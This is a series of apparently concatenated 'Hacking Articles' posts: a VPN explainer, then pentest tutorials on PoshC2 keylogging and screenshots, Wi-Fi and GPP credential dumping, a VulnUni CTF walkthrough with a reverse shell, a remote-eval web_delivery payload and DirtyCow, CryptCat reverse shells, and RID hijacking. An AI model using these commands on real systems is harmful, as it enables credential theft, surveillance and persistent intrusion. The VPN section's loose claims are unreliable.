Introduction

Picture this; the year is 2020. People store their most sensitive data online. They blindly trust that their information is safe, and they do nothing to protect it. Criminals can hack into these people’s computers and steal all of their information, ruining their lives.

This isn’t the plot to a dystopian movie; this is real life.

Cyber Attacks

Cyber attacks are happening every day, and few people do anything to stop it. Even on the heels of enormous data attacks last year, people were mostly unphased. 7.9 billion consumer records were hacked into last year, which is terrifying. It might just be the case that people aren’t familiar with using a VPN.

Why is VPN Useful?

A VPN is a means of protecting someone when they’re online.

A way to think about life online is someone driving an empty bus. Every time that person performs any action online, they get a passenger to walk into the bus. That passenger has a briefcase with invoices, receipts, time spent on the page, and pages the driver visited. The big problem is that passengers will never get off the bus. Every new page clicked online equals a new passenger on the bus.

There are a few problems with this situation. First off, the briefcases have no locks on them. Whoever holds them, can open it and look through all of the documents.

This leads to the second point. The documents enclosed are incredibly private and sensitive. They could contain Social Security and credit card numbers, a huge list of transaction history, as well as a timestamp of every site ever visited.

Some people may not see this as an issue. As long as they’re driving the bus and they keep the door closed, why should they have to worry?

Well, if the driver did anything illegal and the police pull them over, the police can look in every single briefcase on that bus. Even worse, if a criminal hijacks the bus, they can take every briefcase for themselves.

This is where a VPN comes in. A VPN acts as a second, unregistered, self-driving bus.

Now, when the user makes an interaction online, the passenger goes into the self-driving bus with their briefcase. The internet user’s bus will stay empty at all times.

The other key point is that these passenger’s briefcases will be mostly empty. There will be no names registered to the information. All of the sensitive information will be encrypted and unreadable.

VPN is a Universal Concept

All across the globe, people care to protect their sensitive information. Luckily, a VPN is not region-specific. In other words, an American can use a VPN server in Australia. Due to the different levels of technology across the world, a lot of people are recommending Indian VPN server. The reason is that India has a huge infrastructure set up in the technology space.

Using a VPN server from another country takes yet another step to protect the user. Since it creates another step between the user and the information, it keeps them even safer.

Who is a VPN for?

This is not to be misconstrued, though. A VPN is not just for criminals or want to stay invisible as they break the law. In fact, the most notorious online criminal was found and arrested despite his VPN usage. No, a VPN is not for criminals.

A VPN should ideally be used for anyone who uses the internet. It keeps information private and keeps people safe.

Ultimately, it’s taking matters into one’s own hands. It’s been proven time and time again that companies do not value customer information as much as the customers do. They don’t take the necessary precautions. This leads to breach after breach of customer information over the years.

The way a customer’s information stays safe is if the customer keeps it safe. A VPN should be used by anyone who accesses the internet.

Other Uses for a VPN

A VPN is not just used to keep data secure, there are actually a lot of uses.

Some countries have very strict restrictions on their internet usage. For example, over the years different countries completely blocked the use of Facebook. They use geo-tags to block a user’s access to the site based on their physical location. One of the things that a VPN does is strip away a user’s geo-tags. Someone in a country that blocks a site can still access the site using a VPN.

Another common use of a VPN is done in the company’s offices. By having a VPN set up, the workers can go home and access their computer. It works on the same principle as a Facebook blockage. The VPN confuses the workstation, making it think it’s still in the office. A VPN lets office workers work from home without any problem.

Sometimes sites like Netflix, Hulu, or Pandora only allow people in a certain country to enjoy certain content. This can get frustrating and oftentimes it’s due to contract agreements. This is yet another place where a VPN shines. The user can put on their VPN mask and access content that would otherwise be inaccessible from continents away.

Conclusion

Overall there are a lot of interesting facts and uses for VPNs. They protect people from cyberattacks, they keep everyone’s data safe, and they keep hackers away from the user’s sensitive information.

VPNs have use for anyone who accesses the internet. It can help people in countries that have internet restrictions, help office workers work from home, and allow people to view content from other countries. It’s a very interesting technology, and as the world develops there’s sure to be more uses for it.

The post How VPN Technology Protects Your Privacy from Hackers appeared first on Hacking Articles.

PoshC2 is an open-source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 primarily focuses on Windows implantation, it does contain a basic Python dropper for Linux/macOS.

Table of Content

• Introduction
• Features
• Installation
• Enumerate User Information
• Enumerate Computer Information
• Find All Vulnerabilities
• Invoke ARP Scan
• Get Key Strokes
• Get Screenshot

Features of PoshC2

• Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.
• A large number of payloads generated out-of-the-box which are frequently updated and are maintained to bypass common Anti-Virus products.
• Auto-generated Apache Rewrite rules for use in C2 proxy, protecting your C2 infrastructure and maintaining good operational security.
• A modular format allowing users to create or edit C#, PowerShell or Python3 modules which are run in-memory by the Implants.
• Notifications on receiving a successful Implant, such as via text message or Pushover.
• A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history, and suggestions.
• Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.
• Client/Server format allowing multiple team members to utilize a single C2 server.
• Extensive logging. Every action and response is timestamped and stored in a database with all relevant information such as user, host, implant number, etc. In addition to this, the C2 server output is directly logged to a separate file.
• Support for Docker, allowing reliable and cross-platform execution

Installation of PoshC2

We can install PoshC2 automatically for Python3 using the curl command. We need an elevated shell to execute this command successfully.

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash

Now that we have installed the PoshC2 from the Github, we need to configure the listener to our IP Address. This can be done by editing the config file using the following command.

posh-config

After the required configurations are done, we need to open 2 instances of the terminals. Running the server and the handler. We need to run the Implant Handler, used to issue commands to the server and implants.

posh

Further, we will run the server which will communicate with the Implants and receive task output.

posh-server

You can use any one of the methods to gain a session from the ones that are depicted in the image above. Know that, as soon as we run the payload on the target machine. It activates an implant in the Implant handler as shown in the image given below.

Enumerate User Information

Now that we have an active implant in our Posh, It’s time to run some inbuilt modules to get some information about the Target System. We are going to start with the User Information, Group Information. This module dumps all the local users, local groups and their membership on the Target Machine. It gathers all the information using the WMI. To initiate this module, we will be using the following command:

get-userinfo

After working a while on the implant, we see that it has successfully enumerated all the user-related information from the target machine. We have information about the local users, local groups, number of local groups.

Enumerate Computer Information

As we already enumerated the user’s information, now its time to get the information about the system. For this, we will use this implant. It is an external implant that is integrated with Posh C2. This is a Windows Powershell Script that runs in the background by the same name. It uses the PSInfo from the Sysinternals to gain the information regarding the Computer Name, Domain, Operating System, OS Architecture and much more.

get-computerinfo

After working for a while on the implant, we see that it has successfully enumerated a lot of System related information from the target machine.

Find All Vulnerabilities

Now, comes the automated implant. This implant enumerates the target machine for a huge range of Local Privilege Escalation methods. It works quite similar to Windows Exploit Suggester. This is another Powershell script just like the previous implant that has been integrated into PoshC2. We can invoke this implant using the command given below:

find-allvulns

After working for a while on the implant, we can see that it has successfully enumerated all the possible exploits that can be used to elevate privileges on this machine.

Invoke ARP Scan

We can perform an arp-scan on the implant. This is based on the Powershell ArpScanner and uses C# AssemblyLoad. This scan deploys [DllImport(“iphlpapi.dll”, ExactSpelling=true)] to Export ‘SendARP’; by default, it will loop through all interfaces and perform an arp-scan of the local network based on the IP Address and Subnet mask provided by the network adapter. It can be invoked as shown in the image given below:

invoke-arpscan

Here, we can see that the arp-scan module has worked successfully giving us a list of IP Addresses that are in the same network as the target implant.

Get Key Strokes

Now, we will be trying to sniff out some keystrokes from our target implant. This can be done using the get-keystrokes module. This process is divided into 2 parts. First, we shall initiate the capturing and then we will read the captured keystrokes. Although this is an external module initially created in PowerShellMafia, it has changed the function to be in memory and not touch disk. We start capturing the keystrokes using the following command:

get-keystrokes

By default, the keylogger will run for 60 minutes. It has started the sniffing out the keystrokes as shown in the image given below:

Now to read those keystrokes, we need to run the following command:

Get-KeystrokeData

This will show us all the keystrokes that have been performed by the target implant. This is better than other methods to sniff keystrokes because it also shows the function keys like Ctrl and Shifts key entries which can be quite helpful in some scenarios.

Get Screenshot

Now it’s time to get a look at our target’s system. This can be achieved using the get-screenshot module. This is a pretty straight forward method. We will initiate an implant that will help us get screenshots of the screen that is being used by the target at the time. This module is pretty useful as it helps is to get evidence or directly look at what the target is doing by capturing the live screen. You can initiate this module by using the following command:

get-screenshot

As you can see in the following image, the above command has been executed successfully and we have captured the live screen of the target.

Just like it has been mentioned in the above image, you can navigate to the location of the screenshot and access the screen of the target. The screenshot captured by us is shown below:

Author: Kavish Tyagi is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Command & Control: PoshC2 appeared first on Hacking Articles.

Today we will be taking a look at how we can dump Wireless Credentials. We will cover Credential Dumping, Red Teaming, Different ways we can get those pesky wireless credentials.

Table of Content

• What is Credential Dumping?
• Credential Dumping in Real Life
• Credential Dumping and Red Teaming
• Credential Dumping Methods
  • netsh
  • WirelessKeyView
  • Wifi Network Properties
  • LaZagne
  • Mimikatz
  • Metasploit Framework
• Mitigation

What is Credential Dumping?

When the term password cracking is used in the cyber world, it is being used as a broad concept as it shelters all the methods related to attacking/dumping/retrieving passwords of the victim/target. But today, in this article we will solely focus on a technique called Credential Dumping.

Credential dumping is said to be a technique through which username and passwords are extracted of any login account from the target system. It is this technique that allows an attacker to get credentials of multiple accounts from one person. And these credentials can be of anything such as a bank, email account, social media account, wireless networks.

Credential Dumping in Real Life

When an attacker has access to the target system and through that access, they successfully retrieve the whole bunch of their credentials. Once you are inside the target’s system, there are multiple methods to retrieve the credentials of a particular thing. For instance, to redeem all the names and passwords of the wireless networks to which the operating system has connected, there are various methods that an attacker can use and we will try and cover all of those methods here in our article. Now another thing to focus on is that this dumping of credentials can be done both in internal penetration testing and external penetration testing, it depends on the methodology, perspective or subjectivity of the attack on the bases of which the best suitable method can be decided.

Credential Dumping Methods

Just like the instance presented above, we will portray various methods to dump wireless credentials from a system in this article. So, let’s get started, shall we?

Manual Credential Dumping

All the Wi-Fi password with their respective SSID are stored in an XML file. The location of these files is C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***. Here, you will find that SSID of wifi is saved in clear text whereas passwords are stored as keys.

Credential Dumping using netsh

Netsh is a scripting utility provided by Microsoft itself. It can be used both in command prompt or Windows PowerShell. Netsh is short for network shell. When executed, it provides detailed information about the configuration of the network that the system ever had; including revealing the credentials of wireless networks that it has ever been connected to. This utility comes with various parameters that can be used to get various information as per the requirement. This method can be used both in internal and external penetration testing as netsh commands can be executed both locally and remotely.

To get the list of the SSIDs that the device has been connected to use the following command:

netsh wlan show profiles

And as a result of the above command, you can see the names of the Wi-Fi networks that the system was connected to in the past or present such as Meterpreter, Linuxlab, etc. The same has been demonstrated in the image above.

Further, to know the passwords of any one of the mentioned SSIDs use the following command :

netsh wlan show profile name=<SSID Name> key=clear

And just like it is shown in the image above, the result of the above command will give you the password.

Credential Dumping using WirelessKeyView

A wireless key view is a simple software accesses the XML files where wireless passwords are stored and reveals them in cleartext. This tool was developed to recover lost and forgotten password of a wireless network. This is the perfect method for credential dumping in internal network penetration testing. To utilize this method simply download the tool from here and run it, you will get all the Wi-Fi names and its password as shown in the image below:

Credential Dumping using Wifi Network Properties

Our next method is manual, it is good when you are introduced to the network to work but for some reason, the password of the network isn’t revealed to you. Then you can use this method, as it falls under the category of internal penetration testing methodology. To reveal the password of a wireless network manually, go to Control Panel > Network and Internet > Network and Sharing Center and then click on Wi-Fi (*SSID*). A dialogue box will open, in that box click Wireless Properties button in the upper pane. Next, go to Security tab and you can see the password there just as it is shown in the image below:

Credential Dumping using LaZagne

LaZagne is an open-source tool that was developed to retrieve all the passwords stored in your machine. We have covered LaZagne in our other article, which you can read from here. In our experience, LaZagne is an amazing tool for credential dumping and its the best tool to be used for external penetration testing. To extract Wi-Fi password with LaZagne, simply download the tool from here and run it remotely using it following command :

lazagne.exe wifi

After running the above command, all the Wi-Fi-related passwords with their respective SSID will be extracted.

Credential Dumping using Mimikatz

Another method that can be very useful in external penetration testing is using Mimikatz. We have covered various features of Mimikatz in our other article, which you can find here. Once you have the victim’s session use the following commands to get the passwords:

getsystem
load kiwi
wifi_list_shared

And very easily you will have all the passwords at your service as shown in the image above.

Credential Dumping using Metasploit Framework

Then our next method is to use Metasploit to retrieving desired passwords. As all of us know that Metasploit is a framework that provides us with already constructed exploits to make pentesting convenient. And is an amazing platform for a beginner and expert in hacking pentesting world.

Now, to dump credentials there comes an in-built post exploit in the Metasploit and to run the said exploit; go to the terminal of Metasploit by typing msfconsole and get the session of you to the target system using any exploit you prefer. And then background the session use the post-exploit for extracting desired Wi-Fi credentials by using the following commands:

use post/windows/wlan/wlan_profile
set session 1
exploit

And just as it is shown in the image above, you will have your credentials.

Mitigation

There are various measures that you can follow in order to protect yourself from credential dumping attacks. These measures are given below:

• Keep you employees/employers aware
• DO NOT use default SSID of a wireless network
• Do not save the passwords on the system
• Always reconnect to a Wi-Fi manually.
• Have a different network for guests
• Use VPN
• Change your Wi-Fi password regularly
• Use a different IP address instead of the default one
• Make sure your modems don’t have reset button as most of the modems come with the reset button. When the said button is pressed, it brings back the default settings which doesn’t have any security layer and allows anyone to connect.

So, these were the methods to dump wireless credentials. Apply the suggested mitigation to your systems or networks in order to keep yourself safe from attackers. I hope these were useful and keep tuning in for various hacking techniques!

We are well aware these are tough times for everyone and, we, here at hacking articles hope and pray that everyone is safe and following the measure of self-quarantine. And for all the hacking/pen-testing enthusiasts we are working hard to bring more and more new content so that you can learn new things and use this self-isolation to its best. Stay Safe and take care! Happy Hacking!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: Wireless appeared first on Hacking Articles.

People might be aware of “Group Policy Preferences” in Windows Server 2008 that allows system administrators to set up specific configurations. It can be used to create a username and encrypted password on machines. But do you know, that a normal user can elevate privilege to local administrator and probably compromise the security of the entire domain because passwords in preference items are not secured.

Table of Content

• What is Group Policy Preferences?
• Why using GPP to create a user account is a bad Idea?
• Lab Setup Requirement
• Create an Account in Domain Controller with GPP
• Exploiting Group Policy Preferences via Metasploit -I
• Exploiting Group Policy Preferences via Metasploit -II
• Gpp-Decrypt
• GP3finder
• Powershell Empire

What is Group Policy Preferences?

Group Policy preferences shortly term as GPP permit administrators to configure and install Windows and application settings that were previously unavailable using Group Policy. One of the most useful features of Group Policy Preferences (GPP) is the ability to store, and moreover, these policies can make all kinds of configuration changes to machines, like:

• Map Drives
• Create Local Users
• Data Sources
• Printer configuration
• Registry Settings
• Create/Update Services
• Scheduled Tasks
• Change local Administrator passwords

Why using GPP to create a user account is a bad Idea?

If you use Microsoft GPP to create a local administrator account, consider the safety consequences carefully. Since the password is stored in SYSVOL in a preferred item. SYSVOL is the domain-extensive share folder in the Active Directory accessed by all authenticated users.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

When a new GPP is created for the user or group account, it’ll be interrelated with a Group.XML file created in SYSVOL with the relevant configuration information and the password is AES-256 bit encrypted. Therefore the password is not secure at all authenticated users have access to SYSVOL.

“In this article, we will be doing active directory penetration testing through Group Policy Preferences and try to steal store password from inside SYSVOL in multiple ways”.

Let’s Start!!

Lab Setup Requirement

• Microsoft Windows Server 2008 r2
• Microsoft Windows 7/10
• Kali Linux

Create an Account in Domain Controller with GPP

On your Windows Server 2008, you need to create a new group policy object (GPO) under “Domain Controller” using Group Policy Management.

Now create a new user account by navigating to Computer Configuration > Control Panel Settings > Local Users and Groups.

Then Right click in the “Local Users and Groups” option and select the New > Local User.

Then you get an interface for new local user property where you can create a new user account.

As you can observe from the given below image, we had created an account for user “raaz”.

Don’t forget to update the group policy configuration.

So as I had already discussed above, that, whenever a new gpp is created for the user or group account, it will be associated with a Group.XML which is stored inside /SYSVOl.

From the image below, you can see the entire path that leads to the file Group.xml. As you can see, this XML file holds cpassword for user raaz within the property tags in plain text.

Exploiting Group Policy Preferences via Metasploit -I

As we know an authorized user can access SYSVOL and suppose I know the client machine credential, let say raj: Ignite@123 then with help of this I can exploit Group Policy Preference to get the XML file. Metasploit auxiliary module lets you enumerate files from target domain controllers by connecting to SMB as the rouge user.

This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft’s public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit

Hence you can observe, that it has dumped the password:abcd@123 from inside Group.xml file for user raaz.

Exploiting Group Policy Preferences via Metasploit -II

Metasploit also provide a post exploit for enumerating cpassword, but for this, you need to compromised target’s machine at least once and then you will be able to run below post exploit.

This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked.

use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit

From the given below image you can observe, it has been found cpassword twice from two different locations:

• C:\ProgramData\Microsoft\Group Policy\History\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml
• C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

Gpp-Decrypt

Another method is to connect with the target’s machine via SMB and try to access /SYSVOL with the help smbclient. Therefore execute its command to access shared directory via authorized account and then move to following path to get Group.xml file: SYSVOL\sysvol\Pentes.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

smbclient //192.168.1.103/SYSVOL -U raj

As you can observe, we have successfully transfer Group.xml in our local machine. As this file holds cpassword, so now we need to decrypt it.

For decryption, we use ” gpp-decrypt” which is embedded in a simple ruby script in Kali Linux which decrypts a given GPP encrypted string.

Once you got access to Group.xml file, you can decrypt cpassword with the help of the following syntax:

gpp-decrypt <encrypted cpassword >
gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps password in plain text as shown below.

GP3finder

This is another script written in python for decrypting cpassword and you can download this tool from here.

Once you got access to Group.xml file, you can decrypt cpassword with the help of the following syntax:

gpp-decrypt <encrypted cpassword >
gp3finder.exe -D qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps password in plain text as shown below.

PowerShell Empire

This another framework just like Metasploit where you need to access low privilege shell. once you exploit the target machine then use privesc/gpp module to extract the password from inside Group.xml file.

This module Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

agents
usemodule privesc/gpp
execute

As a result, it dumps password in plain text as shown below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Credential Dumping: Group Policy Preferences (GPP) appeared first on Hacking Articles.

Hello! Everyone and Welcome to yet another CTF challenge from emaragkos, called ‘VulnUni: 1.0.1,’ which is available online on vulnhub for those who want to increase their skills in penetration testing and Black box testing.

Level: Easy

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

Scanning

• Netdiscover
• Nmap
• Enumeration
• Browsing HTTP service
• Extracting URLs through burpsuite spider
• Exploitation
• Using sqlmap to exploit SQL vulnerability
• Extracting User information using sqlmap
• Privilege Escalation
• Uploading php shell upload
• Using msfconsole web delivery to get a reverse shell
• Using DirtyCow to exploit kernel version
• Capturing the flag

Walkthrough

Let’s get started and pwn this machine!

Scanning

To identify our target, we will use netdiscover and our target IP is 192.168.1.148 as shown in the image below:

Let’s proceed further with Nmap to scan our target IP to find open ports if any. Use the following command to scan the IP:

nmap -A 192.168.1.148

And as the result shows, port 80 is open with the service of HTTP.

Enumeration

As we are enumerating further, we open the target IP in the browser. The webpage that we came across was about the university.

We couldn’t find anything useful here so we moved on and we started a Directory Bruteforce to enumerate the machine further. This gave us some directories and files namely contact, about, courses etc. But apart from this, there wasn’t anything useful here.

Then, I launched burpsuite and captured the request of the URL in the intercept tab as shown in the following image:

Further, through the spider feature od burpsuite, we were able to find any URLs. Out of these, the E-Class URL was opened. Along with this, we also found the application version, i.e. 1.7.2, could be vulnerable and can be exploited. We made a note of this as it will be useful in further pwning of the lab.

The directory e-class got us a login form. When tried to log in with default username and password, i.e. admin:admin, we successfully logged in.

But after logging in there was a Document Expired error and the URL was redirecting to Vulnuni.local as shown in the image below :

Therefore, we added the host to our /etc/hosts file just like in the image below :

Earlier, we found that the application was using 1.7.2 version which is outdated. And after gathering open intelligence we found that the particular version of  vulnerable to the exploit which was available on exploit-db as shown in the image below :

To use the exploit to our advantage, we needed to capture the request of the login page through burpsuite as shown in the image below :

After capturing the request, copy it to a text file and save file and save it as shown in the following image:

Now, with the help of sqlmap we will inject our malicious query, with the help of the following command:

sqlmap -r vulnuni --dbs --batch

Executing the above command, lead us to find five databases in total, as shown in the image below, all we need now is to get credentials for anyone of the database.

As during the challenge, e-class directory proved to be of importance, we decided to get credentials of eclass first, hence the following command:

sqlmap -r vulnuni -D eclass -T user -C password --dump --batch

We found a few passwords, as shown below, and tried to be by one to log in.

And soon we were successfully logged in as the password is ilikecats89 which you can also observe in the image below :

Upon traversing, we found a link through which we can upload our shell, the link is – http://vulnuni.local/vulnuni-eclass/modules/course_info/restore_course.php

In order to upload our malicious file, we first downloaded php reverse shell and changed IP and PORT to the local host and local port and the uploaded its the compressed version. You will find similar in the image below :

After uploading shell, we started the netcat listener by using the following command:

sudo nc -nvlp 443

Once, the shell file is executed, we have our shell through netcat, as shown in the image below :

But as it is not the best working environment, we are continuing with Metasploit’s “web delivery” Module to transfer our netcat session into a meterpreter one which will further provide us with more options. And for this, type:

use /exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.145
set payload php/meterpreter/reverse_tcp
set srvport 4445
exploit

Note: To get meterpreter shell we sent the php -d allow_url_fopen =true -r “eval(file_get_contents(‘http://192.168.1.92/Oyd1Yv5lI’));” in terminal above.

To upgrade the shell into TTY shell which is more powerful. For this conversion of shell use the following command:

python -c 'import pty;pty.spawn("/bin/bash")'

After getting the TTY shell, we navigated through many directories and we found user flag in the home directory with the help of following commands:

cd /home
ls
cd vuluni
cat flag.txt

Privilege Escalation

We will use the following command to we get the kernel version of the target machine.

uname -r

Then through OSINT, we found that kernel was vulnerable to DirtyCow. Therefore, we downloaded the exploit to our local machine and saved it in /var/www/http and then started the apache server on port 80. Further, we moved the dirtycow.c file to the /tmp directory of the target by using the following commands:

cd /tmp
wget http://192.168.1.145/dirtycow.c

Now, compile the exploit’s c language file to executable binary file using the following command along with giving it permissions as following:

gcc dirtycow.c -0 root -pthread
./root
cd /root
ls
cat flag.txt

And voila!! We have successfully rooted the lab.

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles. Contact here.

The post VulnUni: 1.0.1: Vulnhub Walkthrough appeared first on Hacking Articles.

In this article, we will provide you with some basic functionality of CryptCat and how to get a session from it using this tool.

Table of Content

• Introduction
• Chat
• Verbose mode
• Protect with Password
• Reverse Shell
• Randomize port
• Timeout and Delay interval
• Netcat vs CryptCat 

Introduction

CryptCat is a standard NetCat enhanced tool with two-way encryption. It is the simplest Unix utility tool, which reads and writes data across network connections. It can use TCP or UDP protocol while encrypting the data that is transmitted over the network. It is a reliable back-end tool that is easily driven by other programs and scripts. It is considered to be a network debugging and exploration tool.

CryptCat can act as a TCP/UDP client or server when connected to or when it acts as a listener to the socket. It can take a password and adds a salt to encrypt the data that is being sent over the connections. Without providing a specified password, it will take the default password i.e. “metallica”.

We can explore its working and usage by exploring its available options.

cryptcat -h

Chat

CryptCat can be used to chat between two users. We need to establish a stable connection before the chat. To do this, we need two systems out of these two systems one will be a listener and the other will be an initiator. So that communication can be done from both ends.

Here, we are trying to create a scenario of chat between two users with different operating systems.

User 1

OS: Kali Linux

IP Address: 192.168.0.107

Role: Listener

To initiate listener in Kali Linux, follow this command to create a listener:

cryptcat -l -p 42

User 2

OS: Ubuntu

IP Address: 192.168.0.108

Role: Initiator

To create an initiator, we will just provide the IP Address of the system where we started the listener followed by its port number.

cryptcat 192.168.0.107 42

Verbose mode

In CryptCat, the verbose mode can be initiated by using the [-v] parameter. Now, the verbose mode is made for generating extended information from our actions. We will try the above chatting mechanism with verbose mode. We can see that when we add [-v] to the CryptCat command it displays the information about the process that its performance while connecting.

At Listener Side

cryptcat -lvp 42

At Initiator Side

cryptcat -v 192.168.0.107 42

Protect with password

In CryptCat, we can protect our connection of chatting with a password and password can be applied by using the [-k] parameter. We know that CryptCat provides us end to end encryption, but by using the [-k] parameter we can provide the extra layer of protection to our connection. So that it is almost impossible to decrypt our connection. We can apply for this protection with the following commands.

At listener side, we apply [-k] parameter along with the password.

cryptcat -k ignite -lvp 42

At the Initiator side, we need to apply the same password applied by the listener so that we can connect to some connection.

cryptcat -v -k ignite 192.168.0.107 42

Reverse shell

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine receives the connection through a port by providing a password. To activate the listener on the target machine for getting shell, use the following command:

cryptcat -k mysecret -l -p 3333 0<myfifo | /bin/bash 1>myfifo

Now, at the attacker side, we just need to connect to the victim. Then we can authenticate our self as we got its root access or by the help of whoami command.

cryptcat -k mysecret 192.168.0.107 3333
whoami
ip a

Randomize port

If we cant decide our port number to start the listener or establish our CryptCat connection. Well then, CryptCat has a special [-r] parameter for us which gives us a randomize local port.

cryptcat -lv -r

Timeout and Delay interval

Most of us are confused between these terms. Timeout is supposed to be a time to complete our task or program. Whereas the delay interval is the interval time between two individual requests or tasks. So in CryptCat, we have [-w] parameter for timeout and [-i] parameter for delay interval. To apply these two individual parameters to get our desired results.

At listener side, we apply both times out and the delay interval

cryptcat -v -w 30 -i 10 -l -p 8080

At the initiator, we are only applying timeout.

cryptcat -v -w 2 192.168.0.7 8080

Netcat vs CryptCat

Well before comparing these two first, we need to know about the Netcat or nc. It is a utility tool use TCP and UDP connection to read and write in a network. It can be used for both security and hacking purposes.

In the case of hacking, it can be used with the help of scripts which makes it quite dependable. And if we need to talk about security, it helps us to debug the network along with investing it. If we want to learn all the working of the Netcat. We have covered netcat in our previous article and to read that article click here.

And when it comes to CryptCat, it is a more advanced version of Netcat. It provides us with the two-way encryption that makes our connection more secure. We are comparing these two amazing tools based on connection encryption of the chatting feature by intercepting their network interface with the help of Wireshark.

Netcat:

As we know we apply a listener and an initiator to start this connection for chatting. Along with that, we initiated the Wireshark to intercept its network interface.

At the listener side, we are using [-l] parameter for listening and [-p] parameter for the port number.

nc -l -p 3131

At the Initiator side, we just need to provide a port number, along with the listeners IP Address.

nc 192.168.0.111 3131

Now, we have to check whether our Wireshark was able to catch something or not. As we can see that we successfully intercepted the network and see this network chat.4

Cryptcat:

In cryptcat, we already know that it provides us with two-ways encryption. Which makes the connection network more secure that Netcat. But we need to check this as well by intercepting its chatting with the help of Wireshark. For that connection, we needed a listener and an initiator for connecting a connection.

At the Listener site, we will use the [-p] parameter for port and [-l] for initiating the listener.

cryptcat -l -p 3131

At the initiator side, we just need to provide IP Address along with listeners port number.

cryptcat 192.168.0.111 3131

Now check whether we can acquire anything or not. As we can see that this chat is in encrypted mode.

That is the main difference between the Netcat and the Cryptcat. One provides encryption in its network and the other is not. Some people might say that CryptCat = encryption + Netcat.

Author: Shubham Sharma is a Pentester, Cybersecurity Researcher, Contact Linkedin and twitter.

The post Comprehensive Guide on CryptCat appeared first on Hacking Articles.

In this post, we will be discussed on RID hijacking which is considered to be as a persistence technique in terms of cyber kill chain and in this article, you will learn multiple ways to perform RID hijacking.

Table of Content

Introduction

• FSMO roles
• SID & RID
• Syntax
• Important Key points

RID-Hijacking

• Metasploit
• Empire

Introduction

Microsoft divided the responsibilities of a DC into FSMO roles that together make a full AD system, FSMO (Flexible Single Master Operation) has 5 responsibilities for forest and domain.

• Schema Master (one per forest)
• Domain Naming Master (one per forest)
• Relative identifier (RID) Master (one per domain)
• Primary Domain Controller (PDC) Emulator (one per domain)
• Infrastructure Master (one per domain)

SID & RID

The RID is a Relative Identifier which is the last part of SID (security identifier) and should be unique for a particular object within a domain. Each security principal has a unique SID that is issued by a security agent. The agent can be a Windows local system or domain. The agent generates the SID when the security principal is created. The SID can be represented as a character string or as a structure.

Syntax

Syntax: S-[Revision]-[IdentifierAuthority]-[SubAuthority0]-[SubAuthority1]-…-[SubAuthority[SubAuthorityCount]](-RID)

Eg: S-1-5-21-1543651058-3042185658-368006193-1001

Important Key points

• The revision is always 1 for current NT versions.
• When a new issuing authority is established under Windows (for example, a new computer is deployed or a domain is established), a SID with an arbitrary value of 5 is allocated as an identifier authority.
• A constant value of 21 is used as a particular value for the root of this group of sub-authorities, and a 96-bit random number is generated and parcelled out to the three sub-authorities with each sub-authority having a 32-bit chunk.
• If the new issuing authority under which this SID was developed is a domain, this SID is referred to as the “SID domain.”
• Windows allocates RIDs starting at 1,000; RIDs that have a value of less than 1,000 are considered reserved and are used for special accounts.
• For example, all Windows accounts with a RID of 500 are considered built-in administrator accounts in their respective issuing authorities.

RID Hijacking

‘RID Hijacking’ is a tactic for an adversary to persist inside the victim’s system by hijacking the RID the Administrator account for the Guest account, or another local account. Creating persistence in the victim’s system allows an adversary to establish a foothold, continuously regaining access that will be unseen to you and allow to hijacker to logon as an authorized account which adversary has hijacked.

Thus, for this, you need to have privilege account session as we have in the below image, to establish persistence access.

Rid-Hijacking: Metasploit

So, as you know, we had meterperter session with admin privilege and Metasploit provides a module to create persistence in a victim’s machine by hijacking RID of administrator user.

 This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine. Taking advantage of some Windows Local Users Management integrity issues, this module will allow authenticating with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.

use post/windows/manage/rid_hijack
set getsystem true
set guest_account true
set session 2
set password 123
exploit

Once you run the exploit, it will check the status of the guest account and, if it is found to be disabled, it will activate the account first and overwrite the RID value from 501 to 500, i.e. the RID value of the administrator account.

